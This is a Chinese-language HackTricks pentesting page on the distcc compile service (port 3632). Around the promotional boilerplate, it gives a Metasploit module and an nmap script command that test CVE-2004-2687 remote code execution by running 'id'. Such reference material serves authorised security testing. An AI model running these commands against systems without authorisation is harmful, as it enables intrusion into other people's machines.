hacktricks/network-services-pentesting/3632-pentesting-distcc.md

从零开始学习AWS黑客攻击直到成为英雄 htARTE (HackTricks AWS 红队专家)！

支持HackTricks的其他方式:

• 如果你想在 HackTricks上看到你的公司广告 或者 下载HackTricks的PDF版本，请查看 订阅计划!
• 获取 官方PEASS & HackTricks商品
• 发现 PEASS家族，我们独家的 NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上 关注 我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库 提交PR来分享你的黑客技巧。

基本信息

Distcc旨在通过利用其他计算机上未使用的处理能力来加速编译。安装了distcc的机器可以将代码发送到网络上的另一台计算机进行编译，该计算机安装了distccd守护进程和兼容的编译器。

默认端口： 3632

PORT     STATE SERVICE
3632/tcp open  distccd

利用

检查是否容易受到 CVE-2004-2687 影响以执行任意代码：

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

我认为shodan没有检测到这项服务。

资源

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

帖子由 Álex B (@r1p) 创建

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF版本，请查看订阅计划！
• 获取官方PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组或telegram群组或在Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。